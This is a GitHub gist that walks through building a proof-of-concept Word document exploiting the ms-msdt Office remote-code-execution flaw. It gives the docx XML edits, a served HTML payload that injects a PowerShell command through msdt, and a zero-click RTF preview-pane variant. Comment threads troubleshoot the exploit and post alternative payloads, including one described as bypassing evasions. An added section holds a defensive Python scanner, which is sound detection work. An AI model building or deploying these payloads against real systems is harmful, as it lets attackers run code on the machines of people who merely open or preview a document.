@tothi
Last active Jun 25, 2022
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references to HTML files. There is an HTML scheme, "ms-msdt:", which invokes the msdt diagnostic tool, and that tool is capable of executing arbitrary code (specified in its parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

  2. Edit word/_rels/document.xml.rels in the docx structure (it is a plain zip). Modify the XML tag <Relationship> with attribute

Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

and Target="embeddings/oleObject1.bin" by changing the Target value and adding attribute TargetMode:

Target = "http://<payload_server>/payload.html!"
TargetMode = "External"

Note the Id value (probably it is "rId5").

  3. Edit word/document.xml. Search for the "<o:OLEObject ..>" tag (the one with r:id="rId5") and change the attribute Type="Embed" to Type="Link", then add the attribute UpdateMode="OnCall".

NOTE: The created malicious docx is almost the same as for CVE-2021-44444.

  4. Serve the PoC (calc.exe launcher) HTML payload with the ms-msdt scheme at http://<payload_server>/payload.html:
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>

</body>
</html>

Note that the comment line with AAA should be repeated more than 60 times: it pads the file to the size needed for the payload to trigger (the exact reason is not known).

BONUS (0-click RTF version)

If you also add these elements under the <o:OLEObject> element in word/document.xml at step 3:

<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

then it'll work as RTF also (open the resulting docx and save it as RTF).

With RTF, there is no need to open the file in Word, it is enough to browse to the file and have a look at it in a preview pane. The preview pane triggers the external HTML payload and RCE is there without any clicks. :)
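Added here as a defender's triage example (not part of the gist or tothi's PoC): a Python script that inspects a .docx for the combination steps 2 and 3 above produce, namely an oleObject relationship with TargetMode="External" and a URI target, referenced from an <o:OLEObject> with Type="Link" and UpdateMode="OnCall", and that checks fetched HTML for the ms-msdt: scheme. The in-memory sample documents and the host payload.example are constructed for the example; a real Word package has many more parts, which the scanner ignores.

```python
"""Static triage of a .docx for the external OLE-link pattern used by the
ms-msdt PoC (added example, not the gist's own code)."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
OLE_REL_TYPE = R_NS + "/oleObject"
OFFICE_NS = "urn:schemas-microsoft-com:office:office"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

MSDT_SCHEME = re.compile(r"ms-msdt\s*:", re.IGNORECASE)


def has_msdt_scheme(text):
    """True if a fetched HTML/JS body references the ms-msdt: URI scheme."""
    return MSDT_SCHEME.search(text) is not None


def find_external_ole_links(docx_bytes):
    """Scan a .docx (a plain zip) for OLE relationships that point outside the package.

    Returns one dict per external oleObject relationship, joined with the
    attributes of the <o:OLEObject> in word/document.xml that references it.
    'matches_poc' is set when that object is Type="Link" with UpdateMode="OnCall".
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        names = set(zf.namelist())
        if "word/_rels/document.xml.rels" not in names:
            return findings
        rels = ET.fromstring(zf.read("word/_rels/document.xml.rels"))
        external = {}
        for rel in rels.iter("{%s}Relationship" % REL_NS):
            target = rel.get("Target", "")
            # A normal oleObject relationship is a package-relative path such as
            # embeddings/oleObject1.bin; External mode plus a URI scheme is the red flag.
            if (rel.get("Type") == OLE_REL_TYPE
                    and rel.get("TargetMode") == "External"
                    and ":" in target):
                external[rel.get("Id")] = target
        if not external:
            return findings
        ole_attrs = {}
        if "word/document.xml" in names:
            doc = ET.fromstring(zf.read("word/document.xml"))
            for ole in doc.iter("{%s}OLEObject" % OFFICE_NS):
                rid = ole.get("{%s}id" % R_NS)  # the r:id attribute
                ole_attrs[rid] = (ole.get("Type"), ole.get("UpdateMode"))
        for rid, target in external.items():
            ole_type, update_mode = ole_attrs.get(rid, (None, None))
            findings.append({
                "rel_id": rid,
                "target": target,
                "trailing_bang": target.endswith("!"),  # the PoC's "payload.html!" form
                "ole_type": ole_type,
                "update_mode": update_mode,
                "matches_poc": ole_type == "Link" and update_mode == "OnCall",
            })
    return findings


def build_sample_docx(target, ole_type, update_mode=None, external=True):
    """Construct a minimal two-part .docx in memory (constructed sample, not real
    Word output; it carries only the two parts the scanner inspects)."""
    mode_attr = ' TargetMode="External"' if external else ""
    update_attr = ' UpdateMode="%s"' % update_mode if update_mode else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%s/styles" Target="styles.xml"/>'
        '<Relationship Id="rId5" Type="%s" Target="%s"%s/>'
        '</Relationships>' % (REL_NS, R_NS, OLE_REL_TYPE, target, mode_attr)
    )
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="%s" xmlns:o="%s" xmlns:r="%s"><w:body><w:p><w:r>'
        '<w:object><o:OLEObject Type="%s" ProgID="Paint.Picture" r:id="rId5"%s/>'
        '</w:object></w:r></w:p></w:body></w:document>'
        % (W_NS, OFFICE_NS, R_NS, ole_type, update_attr)
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/_rels/document.xml.rels", rels)
        zf.writestr("word/document.xml", document)
    return buf.getvalue()


# Constructed samples: payload.example is a placeholder host, not a real server.
PAYLOAD_LINK = "http://payload.example/payload.html!"
MALICIOUS_DOCX = build_sample_docx(PAYLOAD_LINK, "Link", "OnCall")
BENIGN_DOCX = build_sample_docx("embeddings/oleObject1.bin", "Embed", external=False)

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_DOCX), ("benign", BENIGN_DOCX)):
        print(label, find_external_ole_links(blob))
    # Constructed fragment in the shape of the served payload.html above
    print(has_msdt_scheme('window.location.href = "ms-msdt:/id PCWDiagnostic ..."'))
```

The scanner deliberately flags every External oleObject relationship with a URI scheme, not just the exact PoC shape, because the comments on this gist already show variants (mhtml: targets, different UpdateMode values); the `matches_poc` flag then tells you how closely a hit resembles the steps above.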

@aidenmitchell

aidenmitchell commented May 30, 2022

  1. I created a Word doc with a bitmap OLE object, renamed it to .zip, decompressed it, and edited the files as mentioned.
  2. Re-zipped the edited files, renamed it to .docx, and I get a Word error: Word found unreadable content. Nothing happens.

I'm probably doing something wrong...

@GABRlEL

GABRlEL commented May 30, 2022

>   1. I created a Word doc with a bitmap OLE object, renamed it to .zip, decompressed it, and edited the files as mentioned.
>   2. Re-zipped the edited files, renamed it to .docx, and I get a Word error: Word found unreadable content. Nothing happens.
>
> I'm probably doing something wrong...

Don't go for a un- and rezip, replace the files with their modified files instead.
I used 7-Zip and it worked.

@sin9yt

sin9yt commented May 30, 2022

>   1. I created a Word doc with a bitmap OLE object, renamed it to .zip, decompressed it, and edited the files as mentioned.
>   2. Re-zipped the edited files, renamed it to .docx, and I get a Word error: Word found unreadable content. Nothing happens.
>
> I'm probably doing something wrong...

Have you added the //AAA commented line more than 60 times? I made the mistake of skipping that step and had the same issue before; adding it worked for me.

@TaylorHassall

TaylorHassall commented May 31, 2022

>   1. I created a Word doc with a bitmap OLE object, renamed it to .zip, decompressed it, and edited the files as mentioned.
>   2. Re-zipped the edited files, renamed it to .docx, and I get a Word error: Word found unreadable content. Nothing happens.
>
> I'm probably doing something wrong...

@aidenmitchell In addition to the above, make sure you're not opening X.docx\_rels. It's the x.docx\word\_rels folder you're after. I did this twice without realising. Launching it the first time appears to work but launching the same doc a second time appears to not work.

@y11en

y11en commented May 31, 2022

RTF:

<o:OLEObject Type="Link" ProgID="htmlfile" UpdateMode="OnCall"  ...

<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

</o:OLEObject>

payload.html:


<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ....
// .....  Repeated many times as possible
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ....

    window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression('mspaint'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>

</body>
</html>


@Kami-11094

Kami-11094 commented May 31, 2022

The calc didn't pop up when I finally opened the docx. When I manually run MSDT, I need to enter the key. Does that matter?

@egotisticalgiraffe

egotisticalgiraffe commented May 31, 2022

Doesn't appear to work on Office365 installations.

@GABRlEL

GABRlEL commented May 31, 2022

> Doesn't appear to work on Office365 installations.

I honestly feel like it works on some and doesn't on others. It works on my German install of Microsoft 365 Apps for Enterprise (Version 2108, Build 14326.20962 Click-and-Go, semi-annual).
You might be able to try this suggestion: https://twitter.com/chvancooten/status/1531272978549420034

@reaper987

reaper987 commented May 31, 2022

Maybe I did something wrong, because the file didn't launch the calculator. I've created a new Word file, Insert->Object->Bitmap Image, drew a line in Paint and inserted it in the Word file. I renamed the file as .zip and edited the files through 7-Zip. I added the comment line 61 times. I'm running IIS on local Windows 10 20H2 and can access the default site from the browser. Czech installation of Microsoft 365 Apps for Enterprise (Version 2203, Build 15028.20204 Click To Run) Word opens the file, but didn't launch the calculator. When I open the payload.html in Chrome, it asks if I want to open the diagnostic tool and when I do, it requests a key, same as for user Kami-11094 above.

@GABRlEL

GABRlEL commented May 31, 2022

> Maybe I did something wrong, because the file didn't launch the calculator. I've created a new Word file, Insert->Object->Bitmap Image, drew a line in Paint and inserted it in the Word file. I renamed the file as .zip and edited the files through 7-Zip. I added the comment line 61 times. I'm running IIS on local Windows 10 20H2 and can access the default site from the browser. Czech installation of Microsoft 365 Apps for Enterprise (Version 2203, Build 15028.20204 Click To Run) Word opens the file, but didn't launch the calculator. When I open the payload.html in Chrome, it asks if I want to open the diagnostic tool and when I do, it requests a key, same as for user Kami-11094 above.

Are you trying to access the file via localhost or your IP? When hosting an apache server using XAMPP on my machine, I can access the payload with http://127.0.0.1/mal.html for example.

@reaper987

reaper987 commented May 31, 2022

> Maybe I did something wrong, because the file didn't launch the calculator. I've created a new Word file, Insert->Object->Bitmap Image, drew a line in Paint and inserted it in the Word file. I renamed the file as .zip and edited the files through 7-Zip. I added the comment line 61 times. I'm running IIS on local Windows 10 20H2 and can access the default site from the browser. Czech installation of Microsoft 365 Apps for Enterprise (Version 2203, Build 15028.20204 Click To Run) Word opens the file, but didn't launch the calculator. When I open the payload.html in Chrome, it asks if I want to open the diagnostic tool and when I do, it requests a key, same as for user Kami-11094 above.

> Are you trying to access the file via localhost or your IP? When hosting an apache server using XAMPP on my machine, I can access the payload with http://127.0.0.1/mal.html for example.

Via http://localhost/payload.html

@draguntsow

draguntsow commented May 31, 2022

Great research, thanks! Works perfectly on Word 2016; however, I could not verify exploitability on Word 2019 2205 (16.0.15225.200228). Maybe this version has already received an update.

@Ghostdust-u

Ghostdust-u commented Jun 1, 2022

When I open the payload.html in Chrome, it asks if I want to open the diagnostic tool and when I do, it requests a key. Is that why I failed in my attempt?

@redbaron4

redbaron4 commented Jun 1, 2022

Is this supposed to work in Word-2007? I followed all the steps but the doc file says "Word found unreadable content in xxx. Do you want to recover the contents of this document?" When I click Yes, the HTTP call for .html file goes through (I can see it in access logs on the HTTP server) but nothing happens on the desktop.

@Ghostdust-u

Ghostdust-u commented Jun 1, 2022

When opening payload.html through Chrome it prompts for a password, but that does not affect exploitation of the vulnerability; I reproduced it successfully in Office Word 2016.

@TaylorHassall

TaylorHassall commented Jun 1, 2022

> Doesn't appear to work on Office365 installations.

@egotisticalgiraffe
@draguntsow

Can confirm it does. Latest version 2205 is not affected by this and is patched.

@IGNTom

IGNTom commented Jun 1, 2022

reg delete HKEY_CLASSES_ROOT\ms-msdt /f is the new way to patch this CVE, so if your installation (as mine) didn't activate it by default, try to activate it manually.
This could finally permit you to run your payload.

@Numerok

Numerok commented Jun 1, 2022

The exploit is somewhat working, but I have to manually update the linked object; how do I make it do that automatically?
I tried using Always instead of OnCall but had no luck with it.
RTF also doesn't work.
Tested on Office 2021 (2204 16.0.15128.20128)
and on Office 2019 (2205 16.0.15225.20212).

@irsl

irsl commented Jun 2, 2022

This may be an alternative payload to bypass evasions:
"C:\WINDOWS\system32\msdt.exe" ms-msdt:/id PCWDiagnostic -af C:\PCW8E57.xml /skip TRUE
(see here: https://lolbas-project.github.io/lolbas/Binaries/Msdt/)

@irsl

irsl commented Jun 3, 2022

Save everything you don't want to lose, then:

window.location.href = "ms-cxh-full:sdf"

@KaMiAyin

KaMiAyin commented Jun 3, 2022

Modify target to target= "mhtml: http://127.0.0.1/payload.html ! x-usc: http://127.0.0.1/payload.html "

@machine1337

machine1337 commented Jun 3, 2022

@irsl
Did you bypass Windows Defender?

@Werew1942

Werew1942 commented Jun 8, 2022

Not working on win11, Word 2019. But I see the requests to python's http server

@106-Sam

106-Sam commented Jun 11, 2022

@Werew1942 You need to check your payload.html file. It might have some errors.
